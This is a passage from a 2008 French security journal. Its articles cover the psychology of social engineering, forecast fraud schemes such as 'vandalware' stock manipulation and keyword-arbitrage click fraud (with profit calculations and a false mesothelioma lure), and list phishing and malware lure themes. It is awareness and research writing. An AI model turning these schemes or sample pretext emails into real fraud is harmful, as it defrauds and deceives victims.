Voyons à présent comment les experts en ingénierie sociale peuvent susciter en nous ce type de réactions automatiques dont ils tireront profit.

Déclenchement de biais cognitifs

Un biais cognitif est une erreur mentale résultant de la simplification d'une stratégie de traitement de l'information10. Lorsqu'une heuristique fonctionne mal, elle conduit à un biais. L'ingénierie sociale bouscule nos heuristiques pour créer des erreurs « graves et systématiques11.

Certains biais cognitifs qui peuvent expliquer la réussite de procédés d'ingénierie sociale sont décrits ci-dessous :

Biais de validation décisionnelle Le souvenir d'un choix que l'on a effectué antérieurement lui attribue des aspects positifs plus importants que ses aspects négatifs12. Un internaute peut s'habituer à acheter des articles avec remise sur des sites de vente en ligne lorsqu'il reçoit des e-mails de parrainage d'amis. S'il reçoit un message de spam occasionnel qui ressemble à une autre invitation d'achat, il risque de dévoiler ses informations de carte de crédit sur un site web frauduleux.

Biais de confirmation (d'hypothèse) L'individu cherche à collecter des preuves et à interpréter les informations de façon à confirmer son point de vue13. Prenons un exemple hypothétique. Supposons que la société Acme conclue avec Imprimissimo un contrat de maintenance de ses imprimantes, et que les membres du personnel de gardiennage d'Imprimissimo portent des chemises grises à longues manches avec des badges nominatifs. Au fil du temps, les employés d'Acme s'habitueront à voir les membres du personnel d'Imprimissimo dans leurs uniformes et identifieront quiconque porte une chemise grise à longues manches avec un badge comme un gardien. Un intrus pourrait dont confectionner ou voler un uniforme Imprimissimo afin de se faire passer pour un gardien. En raison du biais de confirmation qui affecte les employés d'Acme, il est fort possible que la légitimité de sa présence ne soit pas mise en cause.

Les politiciens malhonnêtes, les espions et les escrocs savent que jouer sur l'émotion — en particulier sur la peur — pour susciter une réaction affective est un moyen très efficace de parvenir à leurs fins. L'ingénierie sociale s'inscrit dans cette optique.

Page 11: MacAfee Security Journal Fr

AUTOMNE 2008 11

Effet d'exposition Nous sommes attachés aux choses (et aux personnes) qui nous sont familières14. Les nouvelles de catastrophes naturelles ou provoquées par l'Homme entraînent souvent l'émergence de sites web de phishing qui exploitent ce penchant15. Tous ceux qui aiment suivre l'info de près pourraient se laisser piéger par des sites de phishing traitant prétendument de l'actualité brûlante. La familiarité avec les événements évoqués pourraient conduire les internautes à baisser leur garde, sans envisager que ces sites sont susceptibles d'avoir une nature malveillante.

Ancrage L'individu met l'accent sur un élément identificateur qui leur saute aux yeux lorsqu'il prend des décisions16. Un logo d'une banque affiché de façon proéminente sur un site web piraté risque de duper les internautes même si d'autres indicateurs de sécurité révèlent la tromperie17.

Engendrement de schémas erronés

Les psychologues sociaux définissent un « schéma » comme une représentation mentale de la réalité sur laquelle nous nous basons pour tirer des conclusions sur notre environnement. L'on enseigne aux enfants qu'il faut être gentil envers autrui. Le tristement célèbre expert en ingénierie sociale Kevin Mitnick a fait remarquer que les auteurs d'attaques en sont conscients et que leurs requêtes « paraissent à tel point raisonnables qu'elles n'éveillent aucun soupçon de la part de la victime, tout en sachant exploiter la confiance de cette dernière18 ». Ils exploitent ainsi abusivement la structure de notre schéma social.

Quelques exemples de jugements sociaux erronés courants, ainsi que la façon dont ils sont exploités par l'ingénierie sociale, sont décrits ci-dessous :

Erreur d'attribution fondamentale Ce biais consiste à penser que les comportements d'autrui reflètent leurs dispositions internes et permanentes19. Il survient lorsque la première impression est trompeuse. Un expert en ingénierie sociale s'efforcera soigneusement de laisser une première impression très positive. L'auteur d'une attaque aura une approche affable lorsqu'il émet une demande ou dominatrice lorsqu'il veut forcer sa victime à faire quelque chose. La victime potentielle ne se rend pas toujours compte que son interlocuteur joue un rôle, que son comportement est situationnel et que, pour lui, la fin justifie les moyens.

Effet de saillance Dans un groupe d'individus, le sujet considéré comme le plus ou le moins influent est celui qui se remarque le plus20. L'expert en ingénierie sociale sait parfaitement comment s'adapter à la situation et se fondre dans le paysage. Il cherche à faire jouer l'effet de saillance en sa faveur. Il peut très bien se présenter comme un client dans un costume d'homme d'affaires ou comme un gardien en uniforme, mais certainement pas comme un jongleur sur des échasses. Tel un véritable caméléon, il change non seulement de tenue et d'apparence, mais il adopte le jargon de la société, s'informe sur ses événements, son personnel et prend même l'accent régional. Par exemple, pour s'insinuer dans une société, un escroc pourrait fort bien avoir appris qu'une telle attend un bébé, et que Pierre, Paul ou Jacques est sur le point de quitter l'entreprise, et échanger ces potins avec le réceptionniste pour accéder aux bureaux en vue d'y effectuer une prétendue « maintenance informatique ».

Conformité, complaisance et obéissance Les pressions de conformité, de complaisance et d'obéissance entraînent des changements dans les comportements des individus. De nombreuses attaques d'ingénierie sociale peuvent s'expliquer par les réponses prévisibles des victimes à ces pressions. L'auteur d'une attaque peut par exemple prétendre être une directrice en visite et faire pression sur un jeune gardien de la sécurité pour qu'il l'autorise à entrer dans les locaux bien qu'elle ne porte pas de badge d'accès. (La promesse d'une récompense ou la menace de sanctions peuvent ajouter à la pression.) Le gardien peut se sentir désarçonné et céder aux instances de la soi-disant directrice. Des attaques d'ingénierie sociale en groupe n'ont pas été observées, mais on peut imaginer qu'elles existent. Afin de pénétrer dans un bureau, par exemple, certains peuvent se faire passer pour des travailleurs légitimes et faire pression tous ensemble auprès d'un réceptionniste pour qu'il les laisse entrer, et qu'il « arrête de leur faire perdre du temps ». Le malheureux risque fort de céder, simplement pour éviter de se rendre impopulaire. Une autre technique connue pour être utilisée par les espions consiste à fréquenter la victime pendant quelque temps. En premier lieu, l'auteur de l'attaque demande des renseignements innocents à sa proie, puis s'intéresse à des informations sensibles. La victime est prise au piège : elle se sent obligée de se plier aux demandes puisqu'elle a cédé une première fois, sans quoi elle risque de subir un chantage.

Page 12: MacAfee Security Journal Fr

12 McAFEE SECURITY JOURNAL

NOTES 1 « Bank loses $1.1M to online fraud » (Une banque perd 1,1 million de dollars lors d'une

fraude en ligne), BBC, 2007 — http://news.bbc.co.uk/2/hi/business/6279561.stm 2 Schneier B., « The Psychology of Security » (La psychologie de la sécurité), éd.

Essays and Op, 2007 — http://www.schneier.com/essay-155.html 3 ibid. 4 Asimov, I., « The Human Brain: Its Capacities and Functions » (Le cerveau humain,

ses capacités et fonctions), New York, Mentor Books, 1965 [traduction libre] 5 Johnson S., « Mind Wide Open: Your Brain and the Neuroscience of Everyday

Life » (L'esprit à livre ouvert : cerveau et neuroscience au quotidien), New York, Scribner, 2004 [traduction libre]

6 Svoboda E., « Cultivating curiosity; how to explore the world: Developing a sense of wonder can be its own reward » (Cultiver sa curiosité pour explorer le monde : la capacité d'émerveillement peut être une récompense en soi), Psychology Today, 2006 — http://psychologytoday.com/articles/index.php?term=pto-4148.html

7 Leyden J., « Hackers debut malware loaded USB ruse » (Nouvelle ruse de pirates : des clés USB chargées d'un logiciel malveillant), The Register, 2007 — http://www.theregister.co.uk/2007/04/25/usb_malware/

8 Bibliothèque d'informations sur les virus McAfee : GPCoder.i, 9 juin 2008 — http://vil.nai.com/vil/content/v_145334.htm

9 Cialdini R., « Influence: The Psychology of Persuasion » (Influence : la psychologie de la persuasion), New York, HarperCollins, 1998 [traduction libre]

10 Heuer R. J., « The Psychology of Intelligence Analysis » (Psychologie de l'analyse des renseignements), Center for the Study of Intelligence, CIA, 2002 — http://www.au.af.mil/au/awc/awcgate/psych-intel/art12.html

11 Tversky A., Kahneman D., « Judgment under uncertainty: Heuristics and biases » (Jugement en situation d'incertitude : heuristique et biais), Science, 185, 1124-1130, 1974 — http://psiexp.ss.uci.edu/research/teaching/Tversky_Kahneman_1974.pdf

12 Mather M., Shafir E. et Johnson, M. K., « Misrememberance of options past: Source monitoring and choice » (Distorsions dans la mémoire des options passées : repérage des sources et choix), Psychological Science, 11, 132-138, 2000 — http://www.usc.edu/projects/matherlab/pdfs/Matheretal2000.pdf

13 Nickerson R. S., « Confirmation Bias: A Ubiquitous Phenomenon in Many Guises » (Biais de confirmation : un phénomène courant qui prend différentes formes), Review of General Psychology, vol. 2, n° 2, 175-220, 1998 — http://psy.ucsd.edu/~mckenzie/nickersonConfirmationBias.pdf

14 Zajonc R. B., « Attitudinal Effects of Mere Exposure » (Effet de simple exposition — Changements attitudinaux), Journal of Personality and Social Psychology, 9, 2, 1-27, 1968

15 Kaplan D., « Virginia Tech massacre may spawn phishing scams » (De nouvelles escroqueries par phishing risquent de tirer parti du massacre à l'Université de Virginia Tech), SC Magazine, 2007 — http://www.scmagazineuk.com/ Virginia-Tech-massacre-may-spawn-phishing-scams/article/105989/

16 Tversky A., Kahneman D., « Judgment under uncertainty: Heuristics and biases » (Jugement en situation d'incertitude : heuristique et biais), Science, 185, 1124-1130, 1974 — http://psiexp.ss.uci.edu/research/teaching/Tversky_Kahneman_1974.pdf

17 Dhamija R., Ozment A., Schecter S. « The Emperor's New Security Indicators: An evaluation of website authentication and the effect of role playing on usability studies » (Nouveaux indicateurs de sécurité d'Internet : évaluation de l'authentification des sites web et effets d'un jeu de rôle sur les études de facilité d'utilisation), 2008 — http://www.usablesecurity.org/emperor/

18 Mitnick K. D., Simon W. L., « The Art of Deception » (L'art de la supercherie), Indianapolis, Wiley Publishing, Inc., 2002 [traduction libre]

19 Gilbert D. T. et Malone P. S., « The correspondence bias » (Le biais de correspondance), Psychological Bulletin, 117, 21–38, 1995 — http://www.wjh.harvard.edu/~dtg/Gilbert%20&%20Malone%20(CORRESPONDENCE%20BIAS).pdf

20 Taylor S.E. et Fiske S. T., « Point of view and perception so causality » (Point de vue, perception et causalité), Journal of Personality and Social Psychology, 32, 439-445, 1975

21 Computer Security Institute, CSI Computer Crime and Security Survey (Enquête sur la sécurité et le crime informatiques), 2007 — http://www.gocsi.com/forms/csi_survey.jhtml (inscription obligatoire)

ConclusionLa structure même de notre cerveau, et plus précisément les interactions complexes entre les centres de l'émotion et de la raison, fait que nous sommes vulnérables à l'ingénierie sociale. Cette dernière consiste en une manipulation mentale des sentiments de peur, de curiosité, de cupidité et d'empathie. Le succès des attaques d'ingénierie sociale est dû aux biais cognitifs et à des schémas sociaux erronés. Mais pourquoi ces informations nous sont-elles si précieuses ?

Dans l'étude « Computer Crime and Security Survey » (Enquête sur la sécurité et le crime informatiques) réalisée en 2007 par CSI, seulement 13 % des répondants ont déclaré qu'ils contrôlaient l'efficacité des formations de leur personnel contre les attaques d'ingénierie sociale21. Ce pourcentage, certes déjà faible, n'inclut pourtant pas les répondants qui ne disposent d'aucun programme de formation de ce type.

Une première étape évidente consiste à mettre en place des programmes de sensibilisation des utilisateurs aux dangers de l'ingénierie sociale ainsi que des stratégies de sécurité spécifiques, et à améliorer ceux-ci le cas échéant. Toute stratégie relative à l'ingénierie sociale sera plus persuasive si elle est justifiée par des recherches scientifiques. De même, les formations dispensées aux utilisateurs seront plus efficaces si elles répertorient les biais cognitifs généralement exploités dans le cadre de ces attaques et si elles sont accompagnées de vidéos qui illustrent clairement comment ces attaques tirent parti de chacun de nos biais cognitifs.

On ne peut pas changer la nature humaine. Dès la naissance, nos émotions sont séparées de notre raison, et nous sommes donc sujets à commettre des erreurs mentales. Bien que ce comportement soit normal, son exploitation par qui sait y faire en matière d'ingénierie sociale se révèle dangereuse. Pour mieux nous défendre contre ce type d'attaques, il est impératif de bien comprendre la psychologie de l'ingénierie sociale et d'informer correctement les utilisateurs sur ses effets.

Karthik Raman, professionnel certifié en matière de sécurité des systèmes d'information, est chercheur au sein de McAfee Avert Labs. Ses études portent notamment sur l'analyse des vulnérabilités, la sécurité des réseaux et la sécurité des logiciels. Outre la sécurité, il s'intéresse également aux sciences cognitives et sociales, ainsi qu'à la programmation informatique. Parmi ses loisirs, citons le cricket, la guitare et l'apprentissage des langues. Karthik Raman est titulaire de licences en sciences informatiques et en sécurité informatique de la Norwich University (Vermont), qu'il a décrochées en 2006.

Page 13: MacAfee Security Journal Fr

AUTOMNE 2008 13

Markus Jakobsson

L'ingénierie sociale sur le Web : que nous réserve l'avenir ?

Bien que l'ingénierie sociale existe probablement depuis l'aube de la civilisation, les ravages qu'elle cause aujourd'hui en adaptant ses techniques à Internet suscitent de nombreuses préoccupations. Cet article traite de l'évolution probable de ce phénomène.

Il est un fait que l'appât du gain est à l'origine de la déferlante actuelle de logiciels criminels (crimewares). La tendance d'aujourd'hui manifeste une rupture totale avec le passé. Les premiers virus n'étaient autres que l'expression d'une curiosité intellectuelle, du désir de compétition et, probablement, d'un certain ennui. Les fraudes aux clics et les attaques par phishing confirment ce changement : quelle pourrait en être la motivation si ce n'est l'appât du gain ? — ces pratiques pouvant être de fait fort lucratives. Il en va de même pour les différentes formes de spam. Ce dernier n'existerait pas s'il n'était pas synonyme de rentrées d'argent pour les spammeurs. Il paraît donc logique d'examiner les différentes façons dont les cybercriminels exploitent pour leur propre compte les diverses facettes d'Internet afin de prévoir les tendances à venir en matière de fraude.

Fraude sur Internet : l'attaque sociotechniqueLes experts sont de plus en plus nombreux à admettre que la cyberfraude ne se limite plus désormais au domaine technique, mais qu'elle fait de plus en plus appel à l'ingénierie sociale. Le phishing en est l'un des exemples les plus évocateurs, même s'il n'est pas le seul. De nos jours, les attaques de logiciels criminels qui recourent aux techniques d'ingénierie sociale sont de plus en plus courantes. Citons par exemple l'arnaque récemment perpétrée contre le Better Business Bureau (Bureau d'éthique commerciale), illustrée à la figure 1. Lors de cette attaque par phishing, une victime potentielle reçoit un e-mail semblant provenir de cet organisme et signalant une réclamation contre l'entreprise du destinataire. La pièce jointe, qui comporte soi-disant les détails de la réclamation, contient en réalité un téléchargeur de cheval de Troie. Pire encore, ces e-mails sont généralement envoyés à des personnes haut placées dans la hiérarchie de l'organisation visée, bien souvent des responsables de la gestion des plaintes émanant des clients.

Les attaques s'adaptent aux mécanismes de défenseDu point de vue des cybercriminels, la fraude sur Internet est une activité confortable et sans grand danger. En plus de leur garantir des profits juteux et de leur offrir le choix de déterminer l'envergure de leur attaque, elle permet également aux malfrats de « travailler » librement à distance et leur assure une très faible traçabilité, et par conséquent des risques fort limités. L'explosion de la cyberfraude n'a donc rien d'étonnant. Mais pour bien comprendre le fonctionnement de ces attaques, il faut d'abord analyser les mécanismes déployés pour s'en prémunir. Aujourd'hui, la lutte contre la cybercriminalité s'effectue à trois niveaux : par des fonctions techniques (par exemple, logiciels antivirus, filtres antispam et plugins de navigateur antiphishing) ; par des campagnes de sensibilisation telles que celles du FTC, d'eBay, de SecurityCartoon.com, de banques et l'initiative CUPS (CMU Usable Privacy and Security) des laboratoires de Carnegie Mellon University, et enfin par des moyens légaux. Ces derniers impliquent généralement l'identification de l'origine de la fraude, la détection des « drop boxes » (boîtes de dépôt) et, enfin, la traduction en justice des coupables.

Si le déploiement de moyens techniques et les mesures de sensibilisation — lorsqu'ils donnent des résultats tangibles — amenuisent les profits des criminels, les efforts légaux accroissent les risques. Ces derniers sont considérables, en particulier au vu de la croissance effrénée de la fraude sur Internet. Nous avons donc de sérieuses raisons de penser que la cybercriminalité réagira en développant des mécanismes visant à réduire ou à empêcher la traçabilité des attaques. En partant de cette hypothèse, nous chercherons à déterminer les conséquences futures possibles de cette tendance. Pour cela, nous envisagerons deux types d'attaques très difficilement traçables qui, même si elles n'ont encore jamais eu lieu, ne tarderont sans doute pas à se manifester. Commençons par analyser l'importance de l'aspect légal. Nous ferons pour cela une légère digression afin d'examiner les raisons pour lesquelles les logiciels de demande de rançons (ransomwares) n'ont jamais pris l'ampleur et produit les effets désastreux que l'on craignait.

Page 14: MacAfee Security Journal Fr

14 McAFEE SECURITY JOURNAL

Le fiasco des ransomwaresA la fin des années 1990, les chercheurs de l'Université de Columbia ont émis l'hypothèse que la nouvelle vague de logiciels malveillants pourraient tenter de réaliser des prises d'otage de données : celles-ci seraient chiffrées au moyen d'une clé publique véhiculée par un logiciel malveillant, leur « libération » étant conditionnée au paiement d'une rançon contre divulgation de la clé secrète, permettant l'accès aux fichiers chiffrés. Des années plus tard, le cheval de Troie Archiveus a lancé une attaque semblable, à la seule différence qu'il mettait en œuvre un chiffrement par clés symétriques au lieu d'une clé publique. L'attaque a été déjouée lorsqu'une ingénierie inverse a permis de démanteler le cheval de Troie et d'extraire la clé de chiffrement/déchiffrement pour ensuite la distribuer aux victimes. Cependant, l'attaque par Archiveus était sans doute vouée à l'échec même si elle avait utilisé un chiffrement par clé publique (qui, par nature, aurait empêché l'ingénierie inverse de la clé de chiffrement à partir du code, puisque cette clé n'aurait jamais été contenue dans le code). La raison de l'échec probable n'est pas d'ordre technique, mais financier : en effet, les criminels n'auraient eu aucun moyen de récupérer la rançon en toute sécurité, sans être pistés.

L'offensive des logiciels de cybervandalismePartons de l'exemple des logiciels de demande de rançons pour examiner un nouveau type d'attaque, celle des logiciels de cybervandalisme (vandalwares). Ce n'est ni l'amusement ni la provocation qui motive ce type de délinquance, mais plutôt l'intérêt financier. Le cybervandale s'y prend en général de la façon suivante : il commence par choisir l'entreprise qu'il va cibler, puis il recourt à des techniques d'exploration de données pour collecter autant d'informations détaillées que possible sur les travailleurs vulnérables. Ces derniers sont ceux qui ont accès aux données sensibles ou aux pages qui constituent la « devanture » du site web de l'entreprise. L'employé vulnérable constitue pour les vandales du Web une source précieuse d'informations, notamment sur la structure interne de l'entreprise, les noms des personnes occupant des postes importants et le format des adresses e-mail. Ensuite, l'escroc achète des options de vente de l'entreprise (s'il s'agit d'une société cotée en bourse). Une option de vente est un instrument financier dont la valeur augmente si le cours de l'action correspondante chute : elle permet aux investisseurs et spéculateurs d'engranger des bénéfices dans la mesure où un titre est sur le point de perdre de la valeur. Il est fort probable qu'en plus du criminel, d'autres investisseurs acquièrent également des options de vente, en particulier si l'action de l'entreprise ciblée présente un volume de transactions raisonnable. Enfin, le cybervandale lance l'attaque contre la société, en général en envoyant à quelques travailleurs sélectionnés des e-mails falsifiés semblant provenir d'un autre membre du personnel, leur supérieur par exemple : « Bonjour Jacques, Pouvez-vous examiner la présentation PowerPoint en pièce jointe et me dire ce que vous en pensez ? Merci de bien vouloir me faire un bref rapport sur la question pour demain matin. Je compte sur vous. » Ou le soi-disant expéditeur peut être un administrateur système : « Un nouveau virus informatique dangereux a été détecté, et nos systèmes ne sont pas équipés des correctifs adéquats pour nous en protéger. Veuillez installer immédiatement le programme ci-joint sur votre ordinateur pour assurer notre sécurité. Effectuez cette procédure le plus vite possible. »

D'après vous, que se passe-t-il si quelqu'un ouvre ou exécute le fichier joint ? Si l'e-mail ne finit pas dans le dossier de spam et si le système antivirus ne le bloque pas, l'ordinateur est infecté ; un ordinateur qui a accès à des données sensibles ou au site web de l'entreprise. Pire encore, qu'arrive-t-il si ces données sensibles se retrouvent exposées sur Internet, peut-être même sur le site web de l'entreprise elle-même ? Tohu-bohu général, et dégringolade du cours de l'action ! Le criminel remporte donc son pari : il ne lui reste plus qu'à réaliser ses options de vente et à encaisser les bénéfices sur l'action en chute libre. En procédant ainsi, l'auteur de l'attaque reste totalement intraçable, puisqu'il se comporte de la même façon que les autres investisseurs détenant des options de vente. Qui est le coupable ? Personne n'est à même de le dire.

Falsification des clicsLa fraude aux clics est un autre type courant de fraude en ligne. Elle exploite le fait que lorsqu'un internaute clique sur une annonce, l'annonceur paie une commission au site web sur lequel est affichée l'annonce et au portail qui a fourni cette dernière au site web. D'autres types de fraudes similaires tirent parti de campagnes publicitaires qui entraînent un transfert d'argent dès que l'internaute « voit » une bannière publicitaire (qu'il effectue ou non une action), ou déclenchent une vente ou une autre action quand celui-ci voit une annonce. Ces fraudes ont pour objectif de ponctionner ces transferts d'argent (le cybercriminel empoche pour chaque annonce affichée sur son site web) ou de drainer les budgets publicitaires de concurrents (si ces derniers sont les annonceurs qui paient pour les publicités). Souvent, les escrocs génèrent du trafic de façon automatisée, de sorte que les annonces semblent avoir été réellement visualisées par des internautes. L'automatisation peut avoir recours à une forme de logiciel malveillant, tel qu'un réseau de robots. Autre approche courante : les malfaiteurs peuvent recruter des « cliqueurs à gage » qui activeront des annonces sélectionnées.

Figure 1 : Escroquerie contre le Better Business Bureau. L'e-mail contient une pièce jointe infectée, l'auteur de l'attaque espérant que celle-ci sera ouverte par le destinataire.

Réclamation auprès du BBB

BBB CASE #569822971

Page 15: MacAfee Security Journal Fr

AUTOMNE 2008 15

Examinons à présent la façon dont l'ingénierie sociale peut être mise en œuvre dans le cadre d'une nouvelle attaque de type fraude aux clics. (Précisons d'ailleurs à cette occasion que nous conservons les mots clés en anglais et les valeurs en dollars, puisque les exemples cités ne sont valables que pour le marché américain et la langue anglaise.) Penchons-nous d'abord sur un premier scénario courant qui ne constitue pas une fraude aux clics :

Scénario 1 Site web standard. Imaginons un site web légitime qui fournit un service et affiche des annonces liées à ce service. Le contenu des annonces est généralement déterminé de façon automatique par les portails d'annonces (tels que Google et Yahoo), au travers de l'examen automatique du contenu du site web et de la sélection d'annonces sur des thèmes associés à ce contenu. Ainsi, un site web culinaire comportera des annonces sur des machines à café, des casseroles et autres ustensiles de cuisine. En général, les annonces de ces sites sont destinées à générer du trafic et utilisent par conséquent des mots clés comme « couteau », « calphalon », « teflon » et d'autres termes similaires. Ce type de site n'a rien d'inhabituel.

Scénario 2 Arbitrage. Prenons à présent un site web comportant du contenu qui sélectionne des annonces correspondant aux mots clés « find a attorney », qui signifie « rechercher un avocat ». (L'utilisation de l'article « a » plutôt que « an », qui serait l'option grammaticalement correcte, n'est pas un hasard. Les raisons de ce choix vous sont expliquées plus loin.) La sélection des annonces est possible grâce à la présence dans le site d'une grande quantité de texte (visible ou non) où cette expression se répète. Au moment de la rédaction de cet article, le coût d'une stratégie de ce genre oscillait entre 1,07 et 7,05 dollars. Le prix exact dépend de la localisation et de la langue du site, de l'heure du jour et, bien entendu, des offres concurrentes soumises pour ces mots clés car les valeurs des mots clés sont établies suivant un système d'enchères. Par conséquent, si un utilisateur clique sur une annonce de ce site, le propriétaire de l'annonce paiera le montant correspondant au portail, qui à son tour devra transférer le montant (moins la commission) au site web sur lequel l'annonce est affichée.

Imaginons maintenant que ce site place une annonce utilisant les mots clés « find an attorney », qui signifie également « rechercher un avocat ». La seule différence par rapport à l'exemple précédent réside dans l'utilisation de l'article « an » au lieu de « a » : cette combinaison de mots clés, plus courante, présente une fourchette de prix inférieure, qui varie entre 0,87 et 3,82 dollars. Nous supposerons que le site web paie 2 dollars pour chaque visiteur qu'il amène et en reçoit 4 pour chaque visiteur qui clique sur une annonce du site. Dans la mesure où 50 % des visiteurs qui arrivent via l'annonce à 2 dollars cliquent sur une annonce à 4 dollars, le site réalise un bénéfice sans fournir aucun service. C'est ce que l'on appelle « arbitrage de mots clés ». Et comme nous allons le constater, cette approche frise la fraude aux clics même si elle n'en constitue pas véritablement une.

Scénario 3 Attaque par ingénierie sociale. Voyons à présent comment un escroc peut appliquer l'ingénierie sociale à la technique d'arbitrage afin d'amasser une petite fortune. Supposons qu'il mette sur pied un site web qui génère le mot clé « mesothelioma » (mésothéliome), une forme rare de cancer causée par l'exposition à l'amiante. Au moment de la rédaction de cet article, la valeur du mot clé « mesothelioma » sur Google était de 63,42 dollars. L'escroc achète en outre le mot clé « asthma »

(asthme) au prix de 0,10 dollar pour générer du trafic vers son site. Dès que le nombre de visiteurs arrivant sur son site après avoir cliqué sur l'annonce correspondant au mot clé « mesothelioma » atteint le nombre de 634, il réalise un bénéfice. Mais comment ces visiteurs sont-ils amenés à cliquer sur l'annonce ? Supposons que le site web contienne simplement un article soi-disant rédigé par un médecin et dont le sujet est « Saviez-vous que 10 pour cent des asthmatiques risquent de contracter un mésothéliome ? ». Même si cette affirmation est mensongère, de nombreuses personnes concernées par l'asthme et qui ne savent pas exactement ce qu'est un mésothéliome feront exactement ce que veut l'escroc, à savoir cliquer sur l'annonce. Supposons qu'un visiteur sur deux se laisse prendre au piège. Si le site compte mille visiteurs par jour, le cybercriminel engrangera chaque jour un petit magot de plus de 30 000 dollars. Et même avec des mots clés moins évidents, ses gains seront plus qu'appréciables.

Ces trois scénarios diffèrent par leur intention et par leur emploi de l'ingénierie sociale. Du point de vue du fournisseur d'annonces, néanmoins, ils sont très similaires dans leur structure. Le visiteur arrive sur le site, lit son contenu et clique sur une annonce. Bien qu'il soit possible de mettre en corrélation les mots clés entrants et sortants pour détecter les anomalies, les malfaiteurs peuvent faire appel à deux fournisseurs de services différents pour générer respectivement le trafic entrant et le trafic sortant. Cette stratégie rend difficile la détection et le blocage de ce type d'attaque, en particulier si elle est réalisée à petite échelle, mais sur un grand nombre de sites.

ConclusionL'ingénierie sociale sur Internet est désormais solidement et durablement ancrée. Nous avons déjà pu mesurer l'ampleur de ses effets dévastateurs lorsqu'elle est appliquée aux arnaques par phishing. Elle commence en outre à être exploitée pour améliorer l'efficacité du spam et des logiciels criminels. Dans un avenir proche, il faudra malheureusement s'attendre aussi à la progression de certaines applications de l'ingénierie sociale exigeant des compétences plus pointues à des fins frauduleuses, par exemple la fraude aux clics. Nous pouvons concevoir des contre-mesures techniques qui prennent en compte cette tendance. De plus, une meilleure compréhension des diverses formes possibles d'attaques nous aidera à améliorer les mécanismes de défense mis en œuvre. Toutefois, il nous faut également être conscient du fait que notre stratégie nécessite des interfaces utilisateur améliorées, des procédures plus rigoureuses, une réglementation plus stricte ainsi qu'une plus grande sensibilisation. En tant qu'experts en sécurité, la route est encore longue.

Markus Jakobsson est chercheur au Palo Alto Research Center. Ses études portent sur le phishing et les contre-mesures, la fraude aux clics, l'influence du facteur humain sur la sécurité, la cryptographie, la sécurité des réseaux et la conception des protocoles. Il est corédacteur de l'ouvrage Phishing and Countermeasures (Phishing et contre-mesures), publié aux éditions Wiley en 2006, et co-auteur de Crimeware : Understanding New Attacks and Defenses (Logiciels criminels : nouvelles attaques et menaces), publié aux éditions Symantec Press en 2008. Image fournie gracieusement par PARC, photographe : Brian Tramontana

Page 16: MacAfee Security Journal Fr

16 McAFEE SECURITY JOURNAL

Elodie Grandjean

Une cible de choix pour les logiciels d'ingénierie sociale

Les auteurs de logiciels malveillants ont souvent recours à des techniques d'ingénierie sociale pour infecter directement un système ou un hôte, ou pour lancer le téléchargement et l'exécution en cascade de logiciels malveillants.

La plupart d'entre nous ont déjà reçu un e-mail concernant une importante mise à jour de sécurité ou un message émanant d'une ancienne connaissance désireuse de renouer le contact, qui contenaient en réalité une pièce jointe ou une URL malveillante.

Ne croyez pas que les e-mails constituent le seul vecteur de propagation des logiciels malveillants à l'aide des techniques d'ingénierie sociale. Il existe une pléthore d'autres ruses, recourant notamment aux très populaires services de messagerie instantanée. Si son système a été compromis, un ami peut vous envoyer un message dans lequel il vous invite à regarder des photos, accompagné d'une URL pointant vers un fichier. Vous faites naturellement confiance au contact sans savoir que son système est infecté. Et dans de nombreux cas, l'URL vous redirige vers un logiciel malveillant.

D'autres logiciels malveillants font appel à l'ingénierie sociale pour s'emparer d'informations confidentielles, dont les références de connexion, les numéros de carte de crédit, etc. Ces techniques sont généralement utilisées dans le cadre d'attaques par phishing ou d'intrusions sur les serveurs.

Parmi les sujets évoqués par les spécialistes de l'ingénierie sociale pour appâter leurs victimes, les plus souvent utilisés sont les services « pour adultes ». En voici quelques autres, étant entendu que la liste est loin d'être exhaustive :

Liens et images pornographiques

Utilisation d'un nom de femme dans le champ de l'expéditeur

Programmes politiques, y compris demandes de don pour un parti ou un candidat populaire

Faux e-mails émanant de banques, de services de paiement en ligne et d'autres services financiers qui demandent une confirmation ou une mise à jour des références de connexion ou des informations de carte de crédit

E-mails de menace, mentionnant des peines d'emprisonnement ou des appels à des fonctions de juré

Jeux et économiseurs d'écran gratuits contenant un cheval de Troie ou des outils antispyware gratuits, souvent eux-mêmes des programmes malveillants

Evénements majeurs, tels que compétitions sportives, catastrophes climatiques ou actualité brûlante

Mention de célébrités et potins les concernant

Relations secrètes ou considérées comme fiables, notamment l'abonnement à des sites de réseau social, faux amis, anciens camarades de classe, membres de la famille et amants secrets

La liste des sujets potentiels est pratiquement illimitée, et tous sont très attirants pour un grand nombre d'utilisateurs aux quatre coins du monde. A la lumière de la liste, on constate également que l'ingénierie sociale peut souvent prendre pour cible des groupes d'utilisateurs au niveau local ou national. Ainsi, une attaque d'envergure mondiale lancée contre un site de réseau social connu touchera un public international. En revanche, une attaque similaire concernant l'élection présidentielle américaine fera des victimes majoritairement américaines.

Page 17: MacAfee Security Journal Fr

AUTOMNE 2008 17

Pourquoi les Jeux Olympiques ?Depuis des mois, la Chine est sous les projecteurs en raison des Jeux Olympiques 2008 de Pékin. Athlètes, supporters, infrastructure, environnement et politique, entre autres, ont été longtemps au centre de l'actualité.

Sur le front politique, les protestations en faveur du Tibet ont constitué un sujet extrêmement sensible. De nombreuses organisations opposées à l'occupation chinoise du Tibet ont bénéficié de la couverture médiatique des Jeux Olympiques. D'autres questions touchant au travail forcé et aux droits de l'homme ont également été largement débattues sur la place publique. Cette actualité brûlante a motivé de nombreux internautes à lire la presse en ligne.

Dans la période précédant les Jeux, la flamme olympique est devenue un symbole important dans les manifestations de protestation. Le parcours de la flamme a été largement couvert par les médias et suscité de vives réactions parmi ses partisans et opposants. Un tel intérêt constitue évidemment une aubaine pour les auteurs de logiciels malveillants, puisqu'il accroît le nombre de victimes potentielles attirées par le sujet.

Echantillonnage des victimes Une attaque d'ingénierie sociale doit généralement « échantillonner » au préalable ses victimes pour réussir. Examinons à présent les victimes potentielles d'une attaque utilisant le conflit sino-tibétain ou les Jeux Olympiques comme appât.

